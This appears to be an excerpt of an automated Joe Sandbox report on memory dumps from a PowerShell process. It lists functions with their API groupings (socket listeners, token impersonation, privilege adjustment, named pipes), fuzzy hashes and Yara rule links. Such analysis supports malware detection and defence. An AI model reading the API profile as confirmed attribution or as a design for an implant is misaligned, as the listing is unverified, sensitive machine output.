                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                                                    • String ID: %s%s%s
                                                    • API String ID: 1671524875-1891519693
                                                    • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                                    • Instruction ID: 8a4a2eccfd361d19fdb1f4fbca8c265f0ca69a020293538bce29c8df7d9b8687
                                                    • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                                    • Instruction Fuzzy Hash: 1141A22470424166FE08EBA2BB6C76E6791B78DBD0F4A4520BE554FFB6CE3CC442A700
                                                    Function 0000022EFA0C6A78 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: bindclosesockethtonsioctlsocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1767165869-0
                                                    • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                                    • Instruction ID: 58a76cfdcf491228b2565e4196740bc7a354a7b8d83289d6d72ca2cd0b6e6305
                                                    • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                                    • Instruction Fuzzy Hash: 02210222304754A2EF208F86F658219A7A0F38CFA4F465624EE5A0BFB0CB3CC445AB00
                                                    Function 0000022EFA0C6670 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                                                    • String ID:
                                                    • API String ID: 3910169428-0
                                                    • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                                    • Instruction ID: 906cb0c793f7a0132899446ecd1a280b114b3057945957d12f778d296e1337be
                                                    • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                                    • Instruction Fuzzy Hash: 7121AE26210B40A2EF249F61F6583993760F78CBA4F5252259E5947FE0DE3CC94AE700
                                                    Function 0000022EFA0CDF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                                                    • String ID: %s\%s
                                                    • API String ID: 3621627092-4073750446
                                                    • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                                    • Instruction ID: 2eb07a27f38bd4bea119fbee2442464b1411b042be60441926de1021ebbc0e0b
                                                    • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                                    • Instruction Fuzzy Hash: 27413F20314745A1FF00EBA2FAAD35A63A1E78DBC4F550025A94D5FFB6DE3CC546A740
                                                    Function 0000022EFA0BFA1C Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountSleepTick$closesocket
                                                    • String ID:
                                                    • API String ID: 2363407838-0
                                                    • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                                    • Instruction ID: 3f7bd66fb12823eb6d83d45480e0831ba9567106b04dcc9a70ef3062cf7f7ca5
                                                    • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                                    • Instruction Fuzzy Hash: 5F21A72170464461EE20ABA2F65825E6350B78DBE0F464721FDBA8BFF6DE3CC545A701
                                                    Function 0000022EFA0CEE8C Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: bindclosesockethtonslistensocket
                                                    • String ID:
                                                    • API String ID: 564772725-0
                                                    • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                                    • Instruction ID: 721c30efaa2644c7706737280ca2dfb9bd3ccb10a411cd0e561b56641a564476
                                                    • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                                    • Instruction Fuzzy Hash: D611032260475492EE20AF91FA2921AB360F78CFE0F060625EE991BFF4CF7CC105A704
                                                    Function 0000022EFA0C0B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                    • String ID: %s
                                                    • API String ID: 4244140340-620797490
                                                    • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                                    • Instruction ID: db78b00591234d7f65bf2b2182812bdab3e8bcfb6942e21dbdd3b88b03e44df6
                                                    • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                                    • Instruction Fuzzy Hash: 6F215972B00B00A9FB149FA1E5587AC73A5B758B88F4544168E4C9BFA9EF78C614E380
                                                    Function 0000022EFA0C5854 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$ErrorLastSleepioctlsocket
                                                    • String ID:
                                                    • API String ID: 1121440892-0
                                                    • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                                    • Instruction ID: 06b3f1a4c6b6441d7042562ec7da67ca6a0c3289ef082e8886a8d60e10864c25
                                                    • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                                    • Instruction Fuzzy Hash: 42316B36B00B40A6EF10DBA2E5982AC73B9F38CB90F520626DE5D97FA5DE38C515D340
                                                    Function 0000022EFA0C76F0 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1212816094-0
                                                    • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                                    • Instruction ID: 271d3b911519cfe8377cf5d78d87161fd3c89ab4e87e25807eeb7a65bf11e530
                                                    • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                                    • Instruction Fuzzy Hash: 3DF0212631464453EF548BB5F5C975A53A0D78C790F565425FA0B4AF74CE3CC444AB00
                                                    Function 0000022EF9B3B7B0 Relevance: 5.9, Strings: 4, Instructions: 884COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $<$ailure #%d - %s$e '
                                                    • API String ID: 0-963976815
                                                    • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                    • Instruction ID: 2f70d7a9d35031bc7479e1bce26d728f803154bb4e797c50f4ba147576fd9b1b
                                                    • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                    • Instruction Fuzzy Hash: AD92E1B2325A8087DB58CB5DE4A573AB7A1F3C8B84F44512AEB9B87794CE3CC451DB04
                                                    Function 0000022EFA0BDA3C Relevance: 4.9, APIs: 3, Instructions: 374memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                                                    • String ID:
                                                    • API String ID: 3419463915-0
                                                    • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                                    • Instruction ID: 8612554504fa7a9aac0bad0d8e782d54ae22791234dedcfe7bafdb7c0a24e029
                                                    • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                                    • Instruction Fuzzy Hash: 07E1A562610741A3FF28CBA5FA553AAA3A1F75C384F054125DB8ADBFA2DB3CE045D340
                                                    Function 0000022EFA0CDEC8 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                                                    • Instruction ID: 6462c2156cb3ec47cf88a60691205ef4dde0d67143a9b1e90d6d8ff13097a014
                                                    • Opcode Fuzzy Hash: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                                                    • Instruction Fuzzy Hash: E4015E73624A418FEB208F60E4893AE33B0F35876EF010909F64946EA9DB7CC159CF40
                                                    Function 0000022EFA0DC3B0 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $<
                                                    • API String ID: 0-428540627
                                                    • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                    • Instruction ID: b9862f2c2469f3e43299910f0a7de1910dbc3bca859739c3264ec9ff45a42dda
                                                    • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                    • Instruction Fuzzy Hash: 3392E3B2325A4087DB58CB1DE4A573AB7A1F3C8B84F44512AE79B87BA4CE3CC551DB04
                                                    Function 0000022EF9B3C397 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ailure #%d - %s$e '
                                                    • API String ID: 0-4163927988
                                                    • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                    • Instruction ID: 1dd36eb37b7f47dbc6d69a01c69b4af96d6b6a95ac5c643404d7453249084db7
                                                    • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                    • Instruction Fuzzy Hash: 9C612CB62146509BDB24CF1DE4E466AB7E1F3CCB84F84421AE38A87B68CB3CD545DB44
                                                    Function 0000022EFA0C0920 Relevance: 1.5, APIs: 1, Instructions: 33pipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateNamedPipe
                                                    • String ID:
                                                    • API String ID: 2489174969-0
                                                    • Opcode ID: ffc033c595a008210ccbf7715394fddec234f51f7fbc04560c83c088a3818f65
                                                    • Instruction ID: 8cdfc71f35d81c91a30e9e59c1217f096b0642703d644405c01957daf3c9174c
                                                    • Opcode Fuzzy Hash: ffc033c595a008210ccbf7715394fddec234f51f7fbc04560c83c088a3818f65
                                                    • Instruction Fuzzy Hash: 9C018C32610B42AAEF11CB90F94835A77A1F79C775F564314D6990AFE6EB3CC118EB04
                                                    Function 0000022EF9B3CFF0 Relevance: .6, Instructions: 617COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                    • Instruction ID: b0909672a71837b2583cf8b00c83119afc506bea2e6f70458d2a7eea0321f952
                                                    • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                    • Instruction Fuzzy Hash: 82525EB22149418BDB18CF1DE4B173AB7A1F3C9B80F44852AE7878BB99CE2CD554DB04
                                                    Function 0000022EFA0DDBF0 Relevance: .6, Instructions: 617COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                    • Instruction ID: 7289319a98fc0fd69f5499c9526df5240476a26e0cc2faf47c1825d84e343ddf
                                                    • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                    • Instruction Fuzzy Hash: A55266B221494197DB08CB1CE4A573AB7E1F3C9B80F44852AE7978BBA9CE3DD550DB40
                                                    Function 0000022EF9B3C680 Relevance: .6, Instructions: 592COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                    • Instruction ID: 2789b90ca248a35f56bd16abef7c8d999e29aa727c3d0a305d9ceb89aece5320
                                                    • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                    • Instruction Fuzzy Hash: 705275B221458187DB18CF1DE4A473AB7E1F3C9B80F44852AE7868BB98CA3DD544DF40
                                                    Function 0000022EFA0DD280 Relevance: .6, Instructions: 592COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                    • Instruction ID: 111675f752c247ad95ab9a885b7610dea7761bfa44ec7a4872a80f1396e64eb8
                                                    • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                    • Instruction Fuzzy Hash: B15268B221498197DB08CF1DE4A573AB7E1F3CD780F44852AE7868BBA9CA3CD545DB40
                                                    Function 0000022EF9B19680 Relevance: .4, Instructions: 404COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                                                    • Instruction ID: 410bb539b7fc4aef7a495cc9f4b0e386de28e1d9917ace5069d7236e48d79851
                                                    • Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                                                    • Instruction Fuzzy Hash: 95F19822704683A2EF30CB95F6A839E73A1F7A4798F520115DBC987F85EB34C985DB44
